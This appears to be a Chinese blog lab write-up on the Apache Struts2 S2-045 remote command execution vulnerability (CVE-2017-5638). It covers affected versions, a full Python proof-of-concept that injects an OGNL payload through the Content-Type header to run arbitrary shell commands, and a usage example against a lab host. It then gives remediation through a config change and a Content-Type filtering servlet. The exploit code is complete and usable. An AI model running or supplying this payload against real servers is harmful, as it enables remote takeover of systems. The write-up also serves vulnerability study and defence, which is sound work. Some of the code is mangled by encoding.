Struts2遠(yuǎn)程命令執(zhí)行漏洞

關(guān)于Struts

Struts是Apache基金會(huì)的一個(gè)開(kāi)源項(xiàng)目，Struts通過(guò)采用Java Servlet/JSP技術(shù)，實(shí)現(xiàn)了基于Java EE Web應(yīng)用的Model-View-Controller(MVC)設(shè)計(jì)模式的應(yīng)用框架，是MVC經(jīng)典設(shè)計(jì)模式中的一個(gè)經(jīng)典產(chǎn)品。

目前，Struts框架廣泛應(yīng)用于政府、公安、交通、金融行業(yè)和運(yùn)營(yíng)商的網(wǎng)站建設(shè)，作為網(wǎng)站開(kāi)發(fā)的底層模板使用，是應(yīng)用最廣泛的Web應(yīng)用框架之一。

漏洞介紹

Apache Struts 2被曝存在遠(yuǎn)程命令執(zhí)行漏洞，漏洞編號(hào)S2-045，CVE編號(hào)CVE-2017-5638，在使用基于Jakarta插件的文件上傳功能時(shí)，有可能存在遠(yuǎn)程命令執(zhí)行，導(dǎo)致系統(tǒng)被黑客入侵。

惡意用戶可在上傳文件時(shí)通過(guò)修改HTTP請(qǐng)求頭中的Content-Type值來(lái)觸發(fā)該漏洞，進(jìn)而執(zhí)行系統(tǒng)命令。

影響范圍

Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10

快速測(cè)試方法

使用知道創(chuàng)宇SeeBug的照妖鏡可以直接檢測(cè)站點(diǎn)是否存在本漏洞

https://www.seebug.org/monster/?checker_id=19

漏洞危害

在default.properties文件中，struts.multipart.parser的值有兩個(gè)選擇，分別是jakarta和pell。其中的jakarta解析器是Struts 2框架的標(biāo)準(zhǔn)組成部分。默認(rèn)情況下jakarta是啟用的，所以該漏洞的嚴(yán)重性需要得到正視。

攻擊者可通過(guò)遠(yuǎn)程命令注入執(zhí)行，令系統(tǒng)執(zhí)行惡意命令，導(dǎo)致被黑客入侵，從而威脅服務(wù)器安全，影響極大。

漏洞利用

poc代碼：

# encoding:utf-8

import urllib2

import sys

from poster.encode import multipart_encode

from poster.streaminghttp import register_openers

def poc():

? ? if len(sys.argv) ＜ 3:

? ? ? ? print """Usage: poc.py http://172.16.12.2/example/HelloWorld.action "command""""

? ? ? ? sys.exit()

? ? register_openers()

? ? datagen, header = multipart_encode({"image": open("tmp.txt", "w+")})

? ? header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

? ? header["Content-Type"]="%{(#nike="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=""+str(sys.argv[2])+"").(#iswin=(@java.lang.System@getProperty("os.name").toLowerCase().contains("win"))).(#cmds=(#iswin?{"cmd.exe","/c",#cmd}:{"/bin/bash","-c",#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

? ? request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)

? ? response = urllib2.urlopen(request)

? ? print response.read()

poc()

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

在該實(shí)驗(yàn)環(huán)境中為Python打包程序，poc.exe，使用該工具對(duì)目標(biāo)地址進(jìn)行測(cè)試：

打開(kāi)cmd，切到poc.exe的目錄下，執(zhí)行下面命令：

poc.exe http://172.16.12.2/example/HelloWorld.action "ifconfig"

1

成功執(zhí)行，證明漏洞存在，成功后可以嘗試?yán)寐┒磮?zhí)行其他命令。

漏洞修復(fù)

禁用jakarta框架

在default.properties文件中修改配置，將struts.multipart.parser=jakarta修改為struts.multipart.parser=pell，相當(dāng)于禁用了jakarta框架

添加action攔截器，過(guò)濾非法請(qǐng)求

攔截類SecurityFilter.java代碼

? ? import java.io.IOException;

? ? import javax.servlet.Filter;

? ? import javax.servlet.FilterChain;

? ? import javax.servlet.FilterConfig;

? ? import javax.servlet.ServletException;

? ? import javax.servlet.ServletRequest;

? ? import javax.servlet.ServletResponse;

? ? import javax.servlet.http.HttpServlet;

? ? import javax.servlet.http.HttpServletRequest;

? ? import javax.servlet.http.HttpServletResponse;

? ? public class SecurityFilter extends HttpServlet implements Filter {

? ? /**

? ? *

? ? */

? ? private static final long serialVersionUID = 1L;

? ? public final String www_url_encode= "application/x-www-form-urlencoded";

? ? public final String mul_data= "multipart/form-data ";

? ? public final String txt_pla= "text/plain";

? ? public void doFilter(ServletRequest arg0, ServletResponse arg1,

? ? ? ? ? ? ? ? ? ? FilterChain arg2) throws IOException, ServletException {

? ? ? ? ? ? HttpServletRequest request = (HttpServletRequest) arg0;

? ? ? ? ? ? HttpServletResponse response = (HttpServletResponse) arg1;

? ? ? ? ? ? String contenType=request.getHeader("conTent-type");

? ? ? ? ? ? if(contenType!=null&&!contenType.equals("")&&!contenType.equalsIgnoreCase(www_url_encode)&&!contenType.equalsIgnoreCase(mul_data)&&!contenType.equalsIgnoreCase(txt_pla)){

? ? ? ? ? ? ? ? ? ? response.setContentType("text/html;charset=UTF-8");

? ? ? ? ? ? ? ? ? ? response.getWriter().write("非法請(qǐng)求Content-Type！");

? ? ? ? ? ? ? ? ? ? return;

? ? ? ? ? ? }

? ? ? ? ? ? arg2.doFilter(request, response);

? ? }

? ? public void init(FilterConfig arg0) throws ServletException {

? ? }

}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

將SecurityFilter.java文件編譯為SecurityFilter.class，放入服務(wù)器路徑為：/var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/classes/

修改web.xml(/var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/web.xml)使得添加的攔截器生效

添加代碼：

＜filter>

? ? ＜filter-name>SecurityFilter＜/filter-name>

? ? ＜filter-class>SecurityFilter＜/filter-class>

? ＜/filter>

＜filter-mapping>

? ? ＜filter-name>SecurityFilter＜/filter-name>

? ? ＜url-pattern>/*＜/url-pattern>

＜/filter-mapping>

1

2

3

4

5

6

7

8

使用知道創(chuàng)宇的防護(hù)工具來(lái)攔截網(wǎng)絡(luò)的攻擊流量。

---------------------

作者：mirror97black

來(lái)源：CSDN

原文：https://blog.csdn.net/mirror97black/article/details/78854411

版權(quán)聲明：本文為博主原創(chuàng)文章，轉(zhuǎn)載請(qǐng)附上博文鏈接！